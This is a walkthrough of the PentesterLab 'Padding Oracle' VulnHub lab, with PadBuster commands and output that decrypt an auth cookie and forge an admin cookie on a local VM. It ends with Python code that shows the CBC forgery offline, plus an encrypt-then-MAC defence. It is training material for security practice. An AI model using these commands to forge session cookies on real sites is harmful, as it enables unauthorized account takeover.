Pentester Lab: Padding Oracle || VulnHub Pentester Lab Walkthrough

Hello, everyone. Today, we're delving into a tutorial series centered on the vulnerable machines published as "PentesterLab". Our focus in this session will be on the machine named "Padding Oracle".

To begin, you'll need to download the vulnerable image from VulnHub's website. If you're unfamiliar with VulnHub, don’t worry; you can refer to our earlier videos in the VulnHub playlist for a primer.


VulnHub - Vulnerable by Design

This resource provides access to VulnHub, a platform that offers vulnerable environments for security professionals and enthusiasts to practice and improve their penetration testing skills in a safe and legal manner.


Once you have the image, setting up the virtual machine (VM) in VirtualBox is our next step.


Setting Up

In this section, we're going to guide you through setting up a new virtual machine (VM) in VirtualBox. Since the file we've downloaded comes in the ".iso" format, the first step is creating a new VM.

Begin by launching VirtualBox.

Then, click on "New" to initiate the creation of a new virtual machine (VM). 

Next, we'll need to specify the virtual machine name, operating system type, and version.

From the VulnHub page, we already know that the vulnerable ISO is Linux-based.

Click "Next" to customize the hardware settings by adjusting the RAM and virtual CPU count.

Click Next, and you'll be prompted to create a new virtual hard disk. This step allows you to allocate storage space according to your requirements. 

After configuring the disk, click "Next" to review the settings we chose earlier.

Finally, click "Finish" to complete the creation of your VM. Once the VM is created, you'll see it listed in the VirtualBox Manager. Now, let's organize it by grouping it under "PentesterLab".

Now, let's configure the settings. Select the VM, click on "Settings", and navigate to the storage settings. 

Here, add the ISO image.

Now, change the network adapter to "Host-only adapter" in network settings.

It's important to ensure that both your Kali Linux machine, which I use for performing attacks, and the vulnerable machine are connected to the same network.

With everything set up, it's time to start the Virtual Machines. 

You'll notice that the Vulnerable Machine is ready, displaying a shell prompt for input. However, our goal is to access it from the Kali machine. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first step of our attack: identifying the IP address of the target machine with netdiscover. Open a terminal and run "netdiscover -i" followed by the name of the network interface, here eth1.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.106.0/16   |   Screen View: Unique Hosts                                                                
                                                                                                                                     
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:02      1      60  Unknown vendor                                                                    
 192.168.95.2    08:00:27:db:f4:f2      1      60  PCS Systemtechnik GmbH                                                            
 192.168.95.6    08:00:27:94:f4:75      1      60  PCS Systemtechnik GmbH                                                            

From the scan result, we have obtained our target IP address: "192.168.95.6".

Next, we move on to conducting a network scan to identify open ports. This step is crucial in understanding the attack surface and planning targeted attacks. We'll utilize the widely-used Nmap tool for this task. Execute "nmap -A" followed by the IP address. 

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.95.6

Here "-A" turns on Nmap's aggressive scan: OS detection, version detection, default script scanning and traceroute. It does not widen the port range; by default Nmap scans the 1,000 most common TCP ports, which is why the output below reports 997 closed ports alongside the 3 open ones.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-30 15:45 IST
Nmap scan report for 192.168.95.6
Host is up (0.00056s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0 (protocol 2.0)
| ssh-hostkey: 
|   1024 8b:4c:a0:14:1c:3c:8c:29:3a:16:1c:f8:1a:70:2a:f3 (DSA)
|   2048 d9:91:5d:c3:ed:78:b5:8c:9a:22:34:69:d5:68:6d:4e (RSA)
|_  256 b2:23:9a:fa:a7:7a:cb:cd:30:85:f9:cb:b8:17:ae:05 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.21 ((Unix) DAV/2 PHP/5.4.3)
|_http-server-header: Apache/2.2.21 (Unix) DAV/2 PHP/5.4.3
|_http-title: [PentesterLab] Padding Oracle
3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$ 

After conducting the network scan, we spotted the presence of 3 open ports: 

  • Port 22, using the SSH protocol for secure remote access; 
  • Port 80, employing the HTTP protocol, likely indicates a web service; and 
  • Port 3306, running a MySQL service, is often used for database management. 

These ports are crucial entry points for data communication within the network.

Port 80/TCP in particular is running an HTTP service, which suggests the presence of a vulnerable web application.

So let’s take a look at the web content running on port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

The page describes the lab's task, which requires admin access to complete. The lab title itself names the vulnerability, a padding oracle, so no further scanning is needed.

To understand how a padding oracle works, refer to the following course; that background is needed to make sense of what PadBuster does below.


Padding Oracle Course by PentesterLab

This course offered by PentesterLab focuses on the Padding Oracle vulnerability, providing hands-on exercises and practical knowledge to help individuals understand and exploit this vulnerability effectively.


Moving forward, exploitation necessitates obtaining admin session privileges. Initially, registration is required. Click on the registration button, and provide a username and password.

Upon successful login with the registered username, the primary objective remains acquiring admin access.

Subsequently, the authentication must be manipulated to achieve admin privileges. Utilizing Burp Suite, capture the cookies to facilitate this process.

Begin by initiating Burp Suite. 

Proceed to configure your browser's proxy settings using FoxyProxy.

Access the proxy tab and activate intercept mode to capture target requests. Switch the proxy to Burp Suite within the FoxyProxy extension. 

Re-login using the registered credentials. Upon completion, captured data will populate the intercept window. 

Right-click within this window to reveal a list of options, selecting "Send to Repeater." 

This action opens two panels, one for request and the other for response, facilitating further analysis.

In the left panel, submit the registered username and password as part of the request, then execute the request by clicking the "Send" button.

This action will trigger the generation of an authentication cookie, observable in the right panel as part of the response.

Subsequently, extract the highlighted cookie, as it serves as a pivotal component in acquiring admin access.

To facilitate this process, the "padbuster" tool proves indispensable. 


Using PadBuster

Initiate the procedure by accessing a terminal in Kali Linux and invoking the "padbuster" command. 

┌──(kali㉿kali)-[~]
└─$ padbuster
Command 'padbuster' not found, but can be installed with:
sudo apt install padbuster
Do you want to install it? (N/y)

If the tool is not already installed, a prompt will guide you through the installation process, requiring confirmation ('Y') to proceed.

Do you want to install it? (N/y)y
sudo apt install padbuster
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libadwaita-1-0 libaio1 libappstream5 libatk-adaptor libboost-dev libboost1.83-dev libopenblas-dev libopenblas-pthread-dev
  libopenblas0 libpython3-all-dev libpython3.12 libpython3.12-dev libstemmer0d libxmlb2 libxsimd-dev python3-all-dev python3-anyjson
  python3-beniget python3-gast python3-pyatspi python3-pypdf2 python3-pyppeteer python3-pyrsistent python3-pythran python3.12-dev
  xtl-dev zenity zenity-common
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  padbuster
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 12.1 kB of archives.
After this operation, 41.0 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali kali-rolling/main amd64 padbuster all 0.3.3+git20210818.50e4a3e-1kali1 [12.1 kB]
Fetched 12.1 kB in 18s (658 B/s)                                                                                                     
Selecting previously unselected package padbuster.
(Reading database ... 413656 files and directories currently installed.)
Preparing to unpack .../padbuster_0.3.3+git20210818.50e4a3e-1kali1_all.deb ...
Unpacking padbuster (0.3.3+git20210818.50e4a3e-1kali1) ...
Setting up padbuster (0.3.3+git20210818.50e4a3e-1kali1) ...
Processing triggers for kali-menu (2023.4.7) ...
Scanning processes...                                                                                                                 
Scanning linux images...                                                                                                              

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.
                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$

Upon successful installation, execute the "padbuster -h" command to access the help documentation, thereby familiarizing yourself with the tool's functionalities and command syntax.

┌──(kali㉿kali)-[~]
└─$ padbuster -h
Option headers requires an argument

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| [email protected]                      |
+-------------------------------------------+
    
    Use: padbuster URL EncryptedSample BlockSize [options]

  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to test. Must
                           also be present in the URL, PostData or a Cookie
         BlockSize = The block size being used by the algorithm

Options:
         -auth [username:password]: HTTP Basic Authentication 
         -bruteforce: Perform brute force against the first block 
         -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
         -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
         -encoding [0-4]: Encoding Format of Sample (Default 0)
                          0=Base64, 1=Lower HEX, 2=Upper HEX
                          3=.NET UrlToken, 4=WebSafe Base64
         -encodedtext [Encoded String]: Data to Encrypt (Encoded)
         -error [Error String]: Padding Error Message
         -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
         -interactive: Prompt for confirmation on decrypted bytes
         -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
         -log: Generate log files (creates folder PadBuster.DDMMYY)
         -noencode: Do not URL-encode the payload (encoded by default)
         -noiv: Sample does not include IV (decrypt first block) 
         -plaintext [String]: Plain-Text to Encrypt
         -post [Post Data]: HTTP Post Data String
         -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) 
         -proxy [address:port]: Use HTTP/S Proxy
         -proxyauth [username:password]: Proxy Authentication
         -resume [Block Number]: Resume at this block number
         -usebody: Use response body content for response analysis phase
         -verbose: Be Verbose
         -veryverbose: Be Very Verbose (Debug Only)
         
                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$

To run PadBuster, type "padbuster" followed by the URL of the login page, then the encrypted sample, which is the auth cookie value captured in Burp (keep it URL-encoded exactly as the browser sent it, here "%2B" for "+"), then the block size, 8. Pass the same cookie with the -cookies option so that every test request carries it, and set -encoding 0 because the value is Base64.

┌──(kali㉿kali)-[~]
└─$ padbuster http://192.168.95.6/login.php 2p64EMt%2BUQPvtydis61NgyTfJchTn69f 8 -cookies auth=2p64EMt%2BUQPvtydis61NgyTfJchTn69f -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| [email protected]                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1530

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1677    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended :

Before decrypting, PadBuster sends 256 test requests with modified ciphertext and groups the responses it gets back. Signature 2 came back for 255 of the 256 requests with a 15-byte body: that is the application's padding-error response, and it is the oracle. Signature 1 is the single request whose modified padding happened to be valid.

Enter the recommended ID, 2, so PadBuster knows which response means "bad padding"; it then decrypts the cookie, which the application encrypts with AES-CBC, one byte at a time.

NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (153/256) [Byte 8]
[+] Success: (224/256) [Byte 7]
[+] Success: (248/256) [Byte 6]
[+] Success: (14/256) [Byte 5]
[+] Success: (153/256) [Byte 4]
[+] Success: (37/256) [Byte 3]
[+] Success: (22/256) [Byte 2]
[+] Success: (89/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): efb72762b3ad4d83
[+] Intermediate Bytes (HEX): afeddd62f60b2266
[+] Plain Text: user=use

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (123/256) [Byte 8]
[+] Success: (184/256) [Byte 7]
[+] Success: (87/256) [Byte 6]
[+] Success: (80/256) [Byte 5]
[+] Success: (160/256) [Byte 4]
[+] Success: (218/256) [Byte 3]
[+] Success: (73/256) [Byte 2]
[+] Success: (107/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): 24df25c8539faf5f
[+] Intermediate Bytes (HEX): 9db02065b4aa4a84
[+] Plain Text: r

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=user
[+] Decrypted value (HEX): 757365723D7573657207070707070707
[+] Decrypted value (Base64): dXNlcj11c2VyBwcHBwcHBw==

-------------------------------------------------------
                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$ 

PadBuster decrypts the cookie to the plaintext "user=user". The HEX output shows what follows it: 16 bytes in total, the 9-byte string and then seven 0x07 bytes, which is PKCS#7 padding filling the second 8-byte block. It also prints the value in ASCII, hexadecimal and Base64.

We're close to the objective: we need an auth cookie whose plaintext is "user=admin". PadBuster's -plaintext option forges one through the same oracle, so rerun the previous command with "-plaintext user=admin".

┌──(kali㉿kali)-[~]
└─$ padbuster http://192.168.95.6/login.php 2p64EMt%2BUQPvtydis61NgyTfJchTn69f 8 -cookies auth=2p64EMt%2BUQPvtydis61NgyTfJchTn69f -encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| [email protected]                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1530

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1677    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended :

Specify "2" when prompted for the recommended ID.

NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$

PadBuster successfully encrypts the plaintext, yielding the corresponding ciphertext. Copy this encrypted value.
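The CBC arithmetic behind both PadBuster runs above (decrypting the cookie to user=user, and forging one for user=admin), as an added example that is not part of the original walkthrough. It reuses only the cookie and the intermediate bytes printed in the PadBuster output and makes no requests; the oracle queries are replaced by a lookup of those already-recovered intermediates, so the block size and padding scheme are the only assumptions.

```python
import base64
from urllib.parse import unquote

BLOCK = 8  # block size given to PadBuster above (an 8-byte block; AES blocks are 16 bytes)

# Values copied from the PadBuster output in this walkthrough.
COOKIE = "2p64EMt%2BUQPvtydis61NgyTfJchTn69f"          # auth cookie: IV || C1 || C2
DECRYPT_INTERMEDIATES = [bytes.fromhex("afeddd62f60b2266"),   # D_k(C1)
                         bytes.fromhex("9db02065b4aa4a84")]   # D_k(C2)
# Encrypt mode: PadBuster fixes the last block to all zeros and walks backwards,
# so it needed D_k(00..00) and then D_k of the block it computed from that.
FORGE_INTERMEDIATES = {
    bytes(BLOCK): bytes.fromhex("4a6d7e23d3a76e3d"),
    bytes.fromhex("23037825d5a1683b"): bytes.fromhex("717bc86beb4fdefe"),
}

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def pkcs7_pad(msg):
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n

def pkcs7_unpad(padded):
    n = padded[-1] if padded else 0
    if not 1 <= n <= BLOCK or padded[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")   # this branch is what the oracle leaks
    return padded[:-n]

def decrypt_with_intermediates(cookie, intermediates):
    """CBC decryption is P[i] = D_k(C[i]) XOR C[i-1], with C[0] the IV.
    The oracle never reveals the key, only D_k(C[i]) (the 'intermediate bytes')."""
    iv, *cts = blocks(base64.b64decode(unquote(cookie)))
    plain, prev = b"", iv
    for ct, inter in zip(cts, intermediates):
        plain += xor(inter, prev)
        prev = ct
    return plain

def forge_cookie(plaintext, intermediates_of):
    """Pick the last ciphertext block freely, then set C[i-1] = D_k(C[i]) XOR P[i]
    for each block from the end back to the IV. No key is needed."""
    padded = blocks(pkcs7_pad(plaintext))
    nxt = bytes(BLOCK)          # arbitrary final block; PadBuster uses zeros
    out = [nxt]
    for p in reversed(padded):
        nxt = xor(intermediates_of[nxt], p)
        out.insert(0, nxt)
    return base64.b64encode(b"".join(out)).decode()

if __name__ == "__main__":
    recovered = decrypt_with_intermediates(COOKIE, DECRYPT_INTERMEDIATES)
    print(recovered.hex(), pkcs7_unpad(recovered))
    print(forge_cookie(b"user=admin", FORGE_INTERMEDIATES))
```

The forged value printed by the last line is the same Base64 string PadBuster reported, which shows why the tool needs only two oracle-recovered blocks, not the key.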

Return to the browser and refresh the page, ensuring that the proxy is still set to Burp Suite.


Upon interception of the data, modify the auth value with the generated value from PadBuster.


Click "Forward" to transmit this request to the web server.  Burp Suite automatically dispatches a request to the web server, resulting in login with admin privileges.

Congratulations! We've accomplished the lab's goal.

There's no need to get a foothold on the VM itself. Any doubts or queries can be addressed by leaving a comment in the section below.
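Why the oracle exists and how to close it, as an added defensive example that is not part of the walkthrough or the lab's code: the application answers a padding failure with a different response (the 15-byte body PadBuster grouped as signature 2) than a successful decrypt. Authenticating the cookie with an HMAC that is checked before any decryption (encrypt-then-MAC) rejects every modified ciphertext identically, so byte-by-byte probing gets no signal; the MAC key below is a constructed assumption.

```python
import base64
import hashlib
import hmac

BLOCK = 8     # block size of the lab's cookie (as given to PadBuster above)
MAC_LEN = 32  # HMAC-SHA256 tag appended to IV||ciphertext

# Constructed key for this example; a real deployment keeps it server-side,
# separate from the cipher key, and never derives it from the cookie.
MAC_KEY = b"constructed-example-mac-key"

# IV||ciphertext of the auth cookie captured in the walkthrough (24 bytes, 3 blocks).
LAB_COOKIE_RAW = base64.b64decode("2p64EMt+UQPvtydis61NgyTfJchTn69f")

def issue_token(iv_and_ct, mac_key=MAC_KEY):
    """Encrypt-then-MAC: the tag covers the IV and every ciphertext block."""
    tag = hmac.new(mac_key, iv_and_ct, hashlib.sha256).digest()
    return base64.b64encode(iv_and_ct + tag).decode()

def check_token(token, mac_key=MAC_KEY):
    """Return IV||ciphertext if the tag verifies, else None.

    Every failure (bad Base64, bad length, bad tag) is the same None, and the
    caller decrypts and unpads only after a valid tag, so a client can no
    longer learn anything about padding by submitting modified cookies."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    if len(raw) < MAC_LEN + 2 * BLOCK or (len(raw) - MAC_LEN) % BLOCK:
        return None
    body, tag = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return body

def count_rejected_single_byte_changes(token, mac_key=MAC_KEY):
    """Flip one bit in each IV/ciphertext byte in turn (the kind of change a
    padding-oracle probe makes) and count how many modified tokens are rejected."""
    raw = bytearray(base64.b64decode(token))
    rejected = 0
    for i in range(len(raw) - MAC_LEN):
        modified = bytearray(raw)
        modified[i] ^= 0x01
        if check_token(base64.b64encode(bytes(modified)).decode(), mac_key) is None:
            rejected += 1
    return rejected

if __name__ == "__main__":
    token = issue_token(LAB_COOKIE_RAW)
    print("valid token accepted:", check_token(token) == LAB_COOKIE_RAW)
    print("modified bytes rejected:", count_rejected_single_byte_changes(token), "of 24")
```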
